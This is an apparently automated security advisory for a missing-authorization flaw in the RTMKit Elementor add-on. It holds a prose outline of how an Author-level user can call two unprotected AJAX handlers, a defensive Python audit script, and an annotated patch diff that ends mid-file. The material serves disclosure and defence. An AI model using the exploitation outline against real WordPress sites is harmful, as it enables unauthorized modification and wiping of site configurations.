Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 12, 2026

CVE-2026-3426: RTMKit Addons for Elementor <= 2.0.2 – Authenticated (Author+) Missing Authorization to Widget Configuration Modification (rometheme-for-elementor)

CVE ID: CVE-2026-3426
Severity: Medium (CVSS 4.3)
CWE: CWE-862 (Missing Authorization)
Vulnerable Version: 2.0.2
Patched Version: 2.0.3
Disclosed: May 11, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3426:
This vulnerability allows authenticated attackers with Author-level access to modify or reset site-wide widget configurations in the RTMKit Addons for Elementor plugin, versions up to and including 2.0.2. The issue stems from missing authorization checks in two AJAX handler functions, making unauthorized data modification possible.

Root Cause:
The vulnerability exists in the file rometheme-for-elementor/Inc/Modules/Widgets/WidgetStorage.php. The save_widget() function (line 182) and the reset_all_widgets() function (line 280) are both registered as WordPress AJAX handlers but lack capability checks. Each function only validates a nonce via check_ajax_referer('rtmkit_nonce', 'nonce'). A nonce check is a CSRF defence: it confirms that the request carries a nonce issued to the logged-in user's session, but it says nothing about that user's role or capabilities. Any user with Author-level access, who can obtain the nonce from the admin interface, can therefore call these handlers without holding the 'manage_options' capability.

Exploitation:
Attackers can exploit this by sending authenticated AJAX POST requests to /wp-admin/admin-ajax.php with the action parameter set to the relevant handler. For save_widget(), the WordPress action hook is 'wp_ajax_save_widget'. The attacker sends a JSON payload in the request body containing the key-value pairs of widget settings they wish to modify. For reset_all_widgets(), the action hook is 'wp_ajax_reset_all_widgets', and no additional parameters are required. In both cases the nonce parameter must carry a valid nonce for the authenticated session, which Author-level users can obtain from the WordPress admin interface.

Patch Analysis:
The patch adds capability checks using current_user_can('manage_options') at the beginning of both functions, before any processing occurs. In save_widget() (line 185), the check returns an error response and terminates execution if the user lacks administrator privileges. The same check is applied in reset_all_widgets() (line 288). This ensures that only users with the 'manage_options' capability (typically administrators) can modify or reset widget configurations.
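The root cause above is a pattern rather than a one-off: a wp_ajax_ handler that calls check_ajax_referer() but never current_user_can(). The following Python audit script is an added example, not part of the Atomic Edge analysis or of the plugin's code. It scans PHP source for add_action('wp_ajax_...') registrations, locates each callback's body, and reports handlers that carry a nonce check but no capability check (the CWE-862 shape this advisory describes). The PHP it runs over is a constructed sample modelled on the vulnerable and patched handler shapes; the registration forms it understands ([$this, 'method'] and a plain function-name string) and the brace-matching body extraction are assumptions that a real tool would replace with a proper PHP parser.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample source, modelled on the handler shapes in the advisory:
# one nonce-only handler (the vulnerable pattern), one with nonce + capability
# check (the patched pattern), and one deliberately public nopriv handler.
# This is not the plugin's real code.
SAMPLE_PHP = r'''
<?php
class WidgetStorage {
    public function init() {
        add_action('wp_ajax_save_widget', [$this, 'save_widget']);
        add_action('wp_ajax_reset_all_widgets', [$this, 'reset_all_widgets']);
        add_action('wp_ajax_nopriv_public_lookup', 'rkit_public_lookup');
    }

    public function save_widget()
    {
        check_ajax_referer('rtmkit_nonce', 'nonce');   // CSRF check only, no role check
        $dataJson = json_decode(file_get_contents('php://input'), true);
        update_option('rkit-widget-options', $dataJson);
        wp_send_json_success();
    }

    public function reset_all_widgets()
    {
        check_ajax_referer('rtmkit_nonce', 'nonce');
        if (!current_user_can('manage_options')) {
            wp_send_json_error('Access Denied.');
            wp_die();
        }
        delete_option('rkit-widget-options');
        wp_send_json_success();
    }
}

function rkit_public_lookup()
{
    wp_send_json_success(get_option('rkit-public-data'));
}
'''

# add_action('wp_ajax_<name>', [$this, 'method']) or add_action('wp_ajax_<name>', 'function')
REGISTER_RE = re.compile(
    r"""add_action\(\s*['"](wp_ajax_(?:nopriv_)?\w+)['"]\s*,\s*(?:\[\s*\$this\s*,\s*['"](\w+)['"]\s*\]|['"](\w+)['"])"""
)
NONCE_RE = re.compile(r"\b(check_ajax_referer|wp_verify_nonce)\s*\(")
CAPABILITY_RE = re.compile(r"\bcurrent_user_can\s*\(")


def function_body(source: str, name: str) -> Optional[str]:
    """Return the text between the outermost braces of `function name(...)`, or None.
    Simple brace counting; assumes no unbalanced braces inside string literals."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", source)
    if not m:
        return None
    start = source.find("{", m.end())
    if start == -1:
        return None
    depth = 0
    for i in range(start, len(source)):
        if source[i] == "{":
            depth += 1
        elif source[i] == "}":
            depth -= 1
            if depth == 0:
                return source[start + 1:i]
    return None


@dataclass
class AjaxHandler:
    hook: str
    callback: str
    has_nonce_check: bool
    has_capability_check: bool

    @property
    def finding(self) -> str:
        if self.hook.startswith("wp_ajax_nopriv_"):
            return "review-nopriv"          # public by design: must not perform privileged actions
        if not self.has_capability_check:
            return "missing-authorization"  # any logged-in role can call it (CWE-862)
        return "ok"


def audit_ajax_handlers(source: str) -> List[AjaxHandler]:
    """Pair every wp_ajax_ registration with its callback body and classify it."""
    handlers = []
    for m in REGISTER_RE.finditer(source):
        callback = m.group(2) or m.group(3)
        body = function_body(source, callback) or ""
        handlers.append(AjaxHandler(
            hook=m.group(1),
            callback=callback,
            has_nonce_check=bool(NONCE_RE.search(body)),
            has_capability_check=bool(CAPABILITY_RE.search(body)),
        ))
    return handlers


def missing_authorization(source: str) -> List[str]:
    """Hooks reachable by any authenticated user with no capability check at all."""
    return [h.hook for h in audit_ajax_handlers(source) if h.finding == "missing-authorization"]


if __name__ == "__main__":
    for h in audit_ajax_handlers(SAMPLE_PHP):
        print(f"{h.hook:<32} -> {h.callback:<20} nonce={str(h.has_nonce_check):<5} "
              f"capability={str(h.has_capability_check):<5} {h.finding}")
```

Run against the sample, the script flags only wp_ajax_save_widget: it has a nonce check but no current_user_can(), which is exactly the state of the two WidgetStorage handlers before version 2.0.3. The nopriv handler is reported separately because a capability check is not expected there; what needs review is whether it performs any privileged action at all. The regex-based check is deliberately coarse (it does not confirm the capability check runs before the sensitive operation), so treat its output as a worklist for manual review rather than a verdict.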

Impact:
Successful exploitation allows an authenticated attacker with Author-level access to arbitrarily modify or completely reset all site-wide widget configurations. This could disable critical widgets, replace them with malicious content, or disrupt the site's appearance and functionality. The reset handler is particularly damaging, as it destroys all saved widget settings across the entire site.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/rometheme-for-elementor/Inc/Core/PluginApi.php
+++ b/rometheme-for-elementor/Inc/Core/PluginApi.php
@@ -37,6 +37,12 @@
         // Load the sidebar view file

         check_ajax_referer('rtmkit_nonce', 'nonce');
+
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+
         if (!file_exists(RTM_KIT_DIR . 'views/sidebar.php')) {
             wp_send_json_error('Sidebar view file not found.');
             return;
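Review bot: the `wp_die()` after `wp_send_json_error('Access Denied.')` is unreachable, because `wp_send_json_error()` already terminates the request through `wp_die()`; harmless, but the same two-line pattern is repeated in every handler this patch touches, so either drop it or keep it deliberately with a comment so later readers do not assume it is needed. The placement itself is right: the capability check follows `check_ajax_referer()` and precedes any access to the view file.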
@@ -50,15 +56,23 @@
     public function get_content()
     {
         check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+        $path = sanitize_text_field($_POST['path']);
+        $menus = RTMKitModulesMenu::instance()->get_menu_by_path($_POST['path']);

         if (!isset($_POST['path'])) {
             wp_send_json_error('Path not specified.');
             return;
         }
-        $path = sanitize_text_field($_POST['path']);
-        $file = RTM_KIT_DIR . 'views/' . $path . '.php';
-        if (!file_exists($file)) {
-            return '';
+
+        if (isset($menus['render_view']) && file_exists($menus['render_view'])) {
+            $file = $menus['render_view'];
+        } else {
+            wp_send_json_error('View file not found for the specified path.');
+            return;
         }
         ob_start();
         require_once $file;
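Review bot: the two added lines `$path = sanitize_text_field($_POST['path']);` and `$menus = RTMKitModulesMenu::instance()->get_menu_by_path($_POST['path']);` now run before the `if (!isset($_POST['path']))` guard, so a request without `path` raises an undefined-index notice before the 'Path not specified.' error is sent, and the menu lookup uses the raw `$_POST['path']` while the sanitized `$path` is never used. Move both lines below the `isset` check and pass `$path` to `get_menu_by_path()`.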
--- a/rometheme-for-elementor/Inc/Elements/PricingTable.php
+++ b/rometheme-for-elementor/Inc/Elements/PricingTable.php
@@ -24,8 +24,7 @@
         $icon = 'rkit-widget-icon ' . $this->get_widget_data()['icon'];
         return $icon;
     }
-
-
+
     public function get_categories()
     {
         return ['romethemekit_widgets'];
--- a/rometheme-for-elementor/Inc/Elements/SocialIcon.php
+++ b/rometheme-for-elementor/Inc/Elements/SocialIcon.php
@@ -74,9 +74,9 @@
                 'pointer-on-hover' => esc_html('Pointer On Hover'),
             ],
             'default' => 'flat',
-            'condition' => [
-                'select_color' => 'official'
-            ]
+            // 'condition' => [
+            //     'select_color' => 'official'
+            // ]
         ]);

         $ss = new ElementorRepeater();
@@ -472,6 +472,17 @@
             ]
         ]);

+         $this->add_control('social_pointer_color_normal', [
+            'label' => esc_html('Pointer Color'),
+            'type'  => ElementorControls_Manager::COLOR,
+            'selectors' => [
+                '{{WRAPPER}} .rkit-social-share__link' => '--color:{{VALUE}}'
+            ],
+            'condition' => [
+                'select_skin' => ['pointer', 'pointer-on-hover']
+            ]
+        ]);
+
         $this->add_group_control(
             ElementorGroup_Control_Background::get_type(),
             [
@@ -522,6 +533,17 @@
             ]
         ]);

+        $this->add_control('social_pointer_color_normal', [
+            'label' => esc_html('Pointer Color'),
+            'type'  => ElementorControls_Manager::COLOR,
+            'selectors' => [
+                '{{WRAPPER}} .rkit-social-share__link:hover' => '--color:{{VALUE}}'
+            ],
+            'condition' => [
+                'select_skin' => ['pointer', 'pointer-on-hover']
+            ]
+        ]);
+
         $this->add_group_control(
             ElementorGroup_Control_Background::get_type(),
             [
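Review bot: this hunk registers a second control with the id `social_pointer_color_normal`, identical to the one added in the previous hunk at line 472; Elementor control ids must be unique within a widget, so the hover variant (selector `.rkit-social-share__link:hover`) will not be registered as intended. Give it a distinct id, for example `social_pointer_color_hover`.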
--- a/rometheme-for-elementor/Inc/Modules/Helper/EditorCanvas.php
+++ b/rometheme-for-elementor/Inc/Modules/Helper/EditorCanvas.php
@@ -26,23 +26,34 @@
             add_action('wp_ajax_get_installed_templates', [$this, 'get_installed_templates']);
             add_action('wp_ajax_get_installed_template', [$this, 'get_installed_template']);
             add_action('wp_ajax_get_template_content', [$this, 'get_template_content']);
-            add_action('wp_ajax_is_pro_active' , [$this , 'is_pro_active']);
+            add_action('wp_ajax_is_pro_active', [$this, 'is_pro_active']);
         }
     }

-    public function is_pro_active() {
-        check_ajax_referer('rtmkit_nonce' , 'nonce');
+    public function is_pro_active()
+    {
+        check_ajax_referer('rtmkit_nonce', 'nonce');

         wp_send_json_success(RTMKitCorePlugin::instance()->pro_is_active());
     }

     public function template_category()
     {
+        check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
         wp_send_json_success(RTMKitModulesTemplatekitsTemplatekitAPI::instance()->get_template_categories());
     }

     public function fetch_lib()
     {
+        check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
         wp_send_json_success(RTMKitModulesTemplatekitsTemplatekitAPI::instance()->_get_template_data('templatekits'));
     }
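Review bot: `template_category()` and `fetch_lib()` gain the nonce and `manage_options` checks, but the context lines show three more handlers registered on this class (`get_installed_templates`, `get_installed_template`, `get_template_content`) whose bodies are not in the diff; confirm they carry the same checks, since they load template data for the editor just as these two do. `is_pro_active()` keeping a nonce-only check is defensible because it only returns a boolean.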

--- a/rometheme-for-elementor/Inc/Modules/Menu.php
+++ b/rometheme-for-elementor/Inc/Modules/Menu.php
@@ -42,6 +42,7 @@
                     'function' => [$this, 'rtmkit_root_page'],
                     'icon_url' => RTM_KIT_URL . 'assets/images/romethemekit.svg',
                     'position' => 20,
+                    'render_view' => RTM_KIT_DIR . 'views/dashboard.php',
                 ],
             ],

@@ -51,60 +52,69 @@
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=widgets',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/widgets.php',
                 ],
                 'modules' => [
                     'title' => __('Modules', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=modules',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/modules.php',
                 ],
                 'themebuilder' => [
                     'title' => __('Theme Builder', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=themebuilder',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/themebuilder.php',
                 ],
                 'templates' => [
                     'title' => __('Template Kits', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=templates',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/templates.php',
                 ],
             ],

             'settings' => [
-                'settings' => [
+                'global-kit-setup' => [
                     'title' => __('Global Kit Setup', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
-                    'menu_slug' => 'rtmkit&path=settings',
+                    'menu_slug' => 'rtmkit&path=global-kit-setup',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/settings.php',
                 ],
                 'updates' => [
                     'title' => __('Version Controls', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=updates',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/updates.php',
                 ],
             ],

             'information' => [
                 'submission' => [
-                    'title' => __('Submission', 'rometheme-for-elementor'),
+                    'title' => __('Submissions', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=submission',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/submission.php',
                 ],
                 'system-status' => [
                     'title' => __('System Info', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=system-status',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/system-status.php',
                 ],
                 'documentation' => [
                     'title' => __('Help & Center', 'rometheme-for-elementor'),
                     'capability' => 'read',
                     'menu_slug' => 'rtmkit&path=help',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/help.php',
                 ],
             ],
         ];
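Review bot: the `documentation` entry keeps `'capability' => 'read'` and now gets `'render_view' => RTM_KIT_DIR . 'views/help.php'`, but the `get_content()` handler in PluginApi.php that loads `render_view` files now requires `manage_options`. Users who can see the Help page in the menu will therefore receive 'Access Denied.' from the AJAX loader; either align the menu capability with the handler or make the handler check the capability declared on the matched menu entry.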
@@ -235,7 +245,7 @@
         $wp_admin_bar->add_node([
             'id' => 'rtmkit_submission',
             'parent' => 'rtmkit_menu_bar',
-            'title' => 'Submission',
+            'title' => 'Submissions',
             'href' => admin_url('admin.php?page=rtmkit&path=submission'),
         ]);

@@ -369,4 +379,31 @@
             wp_enqueue_script('rtmkit-new-features', RTM_KIT_URL . 'assets/js/rtmkit-new-feature.js', [], RTM_KIT_VERSION, true);
         }
     }
+
+    protected function findByKey(array $array, string $searchKey)
+    {
+        foreach ($array as $key => $value) {
+
+            // Kalau key ketemu
+            if ($key === $searchKey) {
+                return $value;
+            }
+
+            // Kalau value masih array, lanjut cari ke dalam
+            if (is_array($value)) {
+                $result = $this->findByKey($value, $searchKey);
+                if ($result !== null) {
+                    return $result;
+                }
+            }
+        }
+
+        return null;
+    }
+
+    public function get_menu_by_path(string $path)
+    {
+        $menus = $this->get_menus();
+        return $this->findByKey($menus, $path);
+    }
 }
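Review bot: `findByKey()` matches any key at any depth, so `get_menu_by_path()` returns whatever value sits under the first key equal to `$path`, including attribute keys such as `title`, `function` or `render_view` rather than a menu entry. Restrict the search to the entry level of `get_menus()` (or check that the result is an array containing `render_view` before returning it), and translate the two Indonesian comments to match the rest of the file.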
--- a/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderAPI.php
+++ b/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderAPI.php
@@ -20,6 +20,7 @@
             add_action('wp_ajax_get_themebuilder_table', [$this, 'get_themebuilder_table']);
             add_action('wp_ajax_add_themebuilder', [$this, 'add_themebuilder']);
             add_action('wp_ajax_edit_themebuilder', [$this, 'edit_themebuilder']);
+            add_action('wp_ajax_install_requirements', [$this, 'install_requirements']);
         }
     }

@@ -126,4 +127,46 @@
             wp_send_json_error('Failed Save Template');
         }
     }
+
+    public function install_requirements()
+    {
+        if (!current_user_can('manage_options')) {
+            wp_die();
+        }
+
+         check_ajax_referer('rtmkit_nonce', 'nonce');
+
+        include_once ABSPATH . 'wp-admin/includes/plugin.php';
+        include_once ABSPATH . 'wp-admin/includes/file.php';
+        include_once ABSPATH . 'wp-admin/includes/misc.php';
+        include_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
+
+        $plugin = $_POST['plugin'];
+        $plugin_file = WP_PLUGIN_DIR . '/' . $plugin;
+        $plugin_slug = dirname($plugin);
+
+        if (file_exists($plugin_file)) {
+            // Activate the plugin if already installed but inactive
+            ob_start();
+            activate_plugin($plugin);
+            ob_clean();
+            ob_end_clean();
+            wp_send_json_success("Install and Activate Successfully");
+        } else {
+            ob_start();
+            $plugin_download_url = "https://downloads.wordpress.org/plugin/{$plugin_slug}.latest-stable.zip"; // Adjust URL structure
+            $upgrader = new Plugin_Upgrader();
+            $result = $upgrader->install($plugin_download_url);
+
+            if (is_wp_error($result)) {
+                wp_send_json_error();
+            }
+            $activate_result = activate_plugin($plugin);
+            if (is_wp_error($activate_result)) {
+                wp_send_json_error('Plugin installed but failed to activate: ' . $activate_result->get_error_message());
+            }
+
+            wp_send_json_success('Plugin installed and activated successfully.');
+        }
+    }
 }
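Review bot: `$plugin = $_POST['plugin'];` is used unvalidated to build a filesystem path (`WP_PLUGIN_DIR . '/' . $plugin`), to derive a download slug, and as the argument to `activate_plugin()`. Even though the handler is limited to `manage_options`, validate it against an allowlist of the plugin basenames this feature is meant to install (the `install_requirements` name suggests a fixed set) before any of those uses. Also, `wp_send_json_error();` on install failure sends no message, unlike the activation branch; pass `$result->get_error_message()`. The `ob_clean(); ob_end_clean();` pair is redundant, and `check_ajax_referer()` has an extra space of indentation.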
--- a/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderModule.php
+++ b/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderModule.php
@@ -113,11 +113,9 @@
             return true;
         }

-        // Pastikan struktur include/exclude ada
         $includes = isset($conditions['include']) ? (array) $conditions['include'] : [];
         $excludes = isset($conditions['exclude']) ? (array) $conditions['exclude'] : [];

-        // 🔹 Helper function: cek apakah kondisi cocok
         $match_condition = function ($cond) {

             if (empty($cond['page'])) {
@@ -127,124 +125,224 @@
             $page = $cond['page'];
             $sub  = isset($cond['sub']) ? $cond['sub'] : [];

-            // === 🔸 ENTIRE SITE ===
+            $normalize = function ($val) {
+                if ($val === true || $val === null || $val === '') {
+                    return [true];
+                }
+                return is_array($val) ? $val : [$val];
+            };
+
+            // ===== ENTIRE =====
             if ($page === 'entire') {
                 return true;
             }

-            // === 🔸 ARCHIVES ===
+            // ===== ARCHIVES =====
             if ($page === 'archives' && (is_archive() || is_home())) {
+
                 if (empty($sub)) return true;

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'all':
                             return true;
+
                         case 'author':
-                            if (is_author($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_author($v)) return true;
+                            }
                             break;
+
                         case 'search':
                             if (is_search()) return true;
                             break;
+
                         case 'post_archive':
                             if (is_home()) return true;
                             break;
+
                         case 'categories':
-                            if (is_category($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_category($v)) return true;
+                            }
                             break;
+
                         case 'tags':
-                            if (is_tag($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_tag($v)) return true;
+                            }
                             break;
                     }
                 }
+
+                return false;
             }

-            // === 🔸 SINGULAR ===
+            // ===== SINGULAR =====
             if ($page === 'singular' && is_singular()) {
+
                 if (empty($sub)) return true;

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'all':
                             return true;
+
                         case 'front_page':
                             if (is_front_page() || (is_home() && !is_paged())) return true;
                             break;

                         case 'posts':
-                            if (get_post_type() === 'post' && (empty($val) || get_the_ID() == $val)) return true;
+                            if (get_post_type() === 'post') {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'pages':
-                            if (get_post_type() === 'page' && (empty($val) || get_the_ID() == $val)) return true;
+                            if (get_post_type() === 'page') {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'post_category':
-                            if (is_single() && has_category($val)) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (has_category($v)) return true;
+                                }
+                            }
                             break;
+
                         case 'post_tag':
-                            if (is_single() && has_tag($val)) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (has_tag($v)) return true;
+                                }
+                            }
                             break;
+
                         case 'post_author':
-                            if (is_single() && get_post_field('post_author', get_the_ID()) == $val) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'page_author':
-                            if (is_page() && get_post_field('post_author', get_the_ID()) == $val) return true;
-                            break;
-                        case 'author':
-                            if (is_author($val)) return true;
+                            if (is_page()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
                     }
                 }
+
+                return false;
             }

-            // === 🔸 WOO ===
+            // ===== WOOCOMMERCE =====
             if ($page === 'woocommerce' && function_exists('is_woocommerce')) {
+
                 if (empty($sub)) return is_woocommerce();

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'shop':
                             if (is_shop()) return true;
                             break;
+
                         case 'product_archive':
                             if (is_post_type_archive('product')) return true;
                             break;
+
                         case 'single_product':
-                            if (is_product() && (empty($val) || get_the_ID() == $val)) return true;
+                            if (is_product()) {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'product_categories':
-                            if (is_product_category($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_product_category($v)) return true;
+                            }
                             break;
+
                         case 'product_tags':
-                            if (is_product_tag($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_product_tag($v)) return true;
+                            }
                             break;
+
                         case 'product_author':
-                            if (is_singular('product') && get_post_field('post_author', get_the_ID()) == $val) return true;
+                            if (is_singular('product')) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
                     }
                 }
+
+                return false;
             }
-            // === 🔸 404 ===
+
+            // ===== 404 =====
             if ($page === 'error_404' && is_404()) {
                 return true;
             }

             return false;
         };
-        // 🔹 Jika ada kondisi EXCLUDE yang cocok → langsung FALSE
-        foreach ($excludes as $cond) {
-            if ($match_condition($cond)) {
+
+        // ===== INCLUDE FIRST =====
+        if (!empty($includes)) {
+
+            $includeMatched = false;
+
+            foreach ($includes as $cond) {
+                if ($match_condition($cond)) {
+                    $includeMatched = true;
+                    break;
+                }
+            }
+
+            if (!$includeMatched) {
                 return false;
             }
+
+            // jika include match, cek exclude
+            foreach ($excludes as $cond) {
+                if ($match_condition($cond)) {
+                    return false;
+                }
+            }
+
+            return true;
         }
-        // 🔹 Jika ada kondisi INCLUDE yang cocok → TRUE
-        foreach ($includes as $cond) {
+
+        // ===== ONLY EXCLUDE =====
+        foreach ($excludes as $cond) {
             if ($match_condition($cond)) {
-                return true;
+                return false;
             }
         }
+
         return true;
     }
-
+
     public function load_themebuilder()
     {
         $active_themebuilder = RTMKitModulesThemebuilderThemebuilderStorage::instance()->get_active_themebuilder();
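Review bot: in the archive cases (`author`, `categories`, `tags`) and the WooCommerce `product_categories` / `product_tags` cases, an empty `$val` is normalized to `[true]` and passed straight to `is_author($v)`, `is_category($v)` and friends; WordPress casts that argument to the string "1", so an "any author" or "any category" condition now matches only the object with ID 1, whereas before the change `is_author($val)` with an empty value matched any author archive. The singular cases avoid this with `$v === true || ...`; apply the same short-circuit in the archive cases. Separately, the include/exclude rewrite changes semantics: a template whose include conditions match nothing previously fell through to `return true` and was shown everywhere, and now returns false, which is likely the intended behaviour but should be called out in the changelog.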
--- a/rometheme-for-elementor/Inc/Modules/Widgets/WidgetModule.php
+++ b/rometheme-for-elementor/Inc/Modules/Widgets/WidgetModule.php
@@ -19,6 +19,7 @@
         RTMKitModulesWidgetsWidgetStorage::instance()->init();
         add_action('elementor/elements/categories_registered', [$this, 'add_elementor_widget_categories']);
         add_action('wp_enqueue_scripts', [$this, 'enqueue_widget_style'], 1);
+        add_action('elementor/editor/before_enqueue_scripts', [$this, 'pro_js']);
         new RTMKitModulesHelperSavedTemplateEditor();
     }

@@ -142,4 +143,17 @@
 <?php
         }
     }
+
+    function pro_js()
+    {
+        $list_widgets_pro = RTMKitModulesWidgetsWidgetStorage::instance()->get_widget_data("pro");
+
+        if (ElementorPlugin::$instance->editor->is_edit_mode()) {
+            wp_enqueue_script('rtmprojs', RTM_KIT_URL . 'assets/js/rtmwp.js', ['jquery' , 'wp-i18n'], RTM_KIT_VERSION, true);
+            wp_localize_script('rtmprojs', 'rtmpro', [
+                'is_pro' =>  RTMKitCorePlugin::instance()->pro_is_active() ? 'true' : 'false',
+                'widgets' => $list_widgets_pro
+            ]);
+        }
+    }
 }
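Review bot: `function pro_js()` is declared without a visibility modifier, unlike the other methods in this class; write `public function pro_js()` for consistency (PHP defaults to public, so the hook still fires either way).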
--- a/rometheme-for-elementor/Inc/Modules/Widgets/WidgetStorage.php
+++ b/rometheme-for-elementor/Inc/Modules/Widgets/WidgetStorage.php
@@ -182,6 +182,11 @@
         // Cek keamanan nonce
         check_ajax_referer('rtmkit_nonce', 'nonce');

+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+
         // Ambil body JSON
         $rawInput = file_get_contents('php://input');
         $dataJson = json_decode($rawInput, true);
@@ -280,6 +285,10 @@
     {
         // Cek keamanan nonce
         check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }

         delete_option('rkit-widget-options');

--- a/rometheme-for-elementor/Inc/Themebuilder/HeaderFooter.php
+++ b/rometheme-for-elementor/Inc/Themebuilder/HeaderFooter.php
@@ -77,7 +77,7 @@
                         RTMKitModulesThemebuilderThemebuilderStorage::instance()->get_themebuilder_content($header_id)
                     );
                 echo $fullHeader;
-                break;
+                // break;
             }
         }
     }
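Review bot: commenting out `break;` changes behaviour rather than tidying: the loop now continues after `echo $fullHeader;`, so when more than one header template matches the current page every matching header is output in sequence. If rendering multiple headers is intended, say so in a comment and remove the dead `// break;`; if not, restore the `break`.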
--- a/rometheme-for-elementor/RomeTheme.php
+++ b/rometheme-for-elementor/RomeTheme.php
@@ -3,20 +3,20 @@
 /**
  * Plugin Name:       RTMKit Addons for Elementor
  * Description:      The best toolkit solution for Elementor. Enjoy advanced addons, theme builders, forms, icons, and ready-made templates to create stunning websites quickly and effortlessly.
- * Version:           2.0.2
+ * Version:           2.0.3
  * Author:            Rometheme
  * Author URI: 	  	  https://rometheme.net/
  * License : 		  GPLv3 or later
  * Requires Plugins : elementor
- * Elementor tested up to: 3.30.2
- * Elementor Pro tested up to: 3.30.0
+ * Elementor tested up to: 3.35.0
+ * Elementor Pro tested up to: 3.35.0
  * Text Domain:      rometheme-for-elementor
  * The best toolkit solution for Elementor. Enjoy advanced addons, theme builders, forms, icons, and ready-made templates to create stunning websites quickly and effortlessly.
  */
 if (!defined('ABSPATH')) {
     exit; // Exit if accessed directly
 }
-defined('RTM_KIT_VERSION') || define('RTM_KIT_VERSION', '2.0.2');
+defined('RTM_KIT_VERSION') || define('RTM_KIT_VERSION', '2.0.3');
 defined('RTM_KIT_DIR') || define('RTM_KIT_DIR', plugin_dir_path(__FILE__));
 defined('RTM_KIT_URL') || define('RTM_KIT_URL', plugin_dir_url(__FILE__));
 defined('RTM_KIT_FILE') || define('RTM_KIT_FILE', __FILE__);
--- a/rometheme-for-elementor/views/dashboard.php
+++ b/rometheme-for-elementor/views/dashboard.php
@@ -91,10 +91,10 @@
                     </div>
                 </div>
                 <div class="col-sm-5 col-md-5 col-lg-5 col-xl-5 col-4 col-xxl-4">
-                    <div class="card rounded-4 text-center  flex-column justify-content-center align-items-center gap-3 p-2 h-100" style="background-image: url(<?php echo esc_url(RTM_KIT_URL . 'assets/images/banner-bg.png') ?>); background-size:cover; background-repeat:no-repeat;">
-                        <span class="accent-color fs-5">UPGRADE TO PRO</span>
-                        <h1 class="m-0 fw-light fs-1 text-center lh-1">Unlock Now<br /><span class="fw-bold fs-1 lh-1 text-white">Hi-End Power</span></h1>
-                        <span class="text-white">
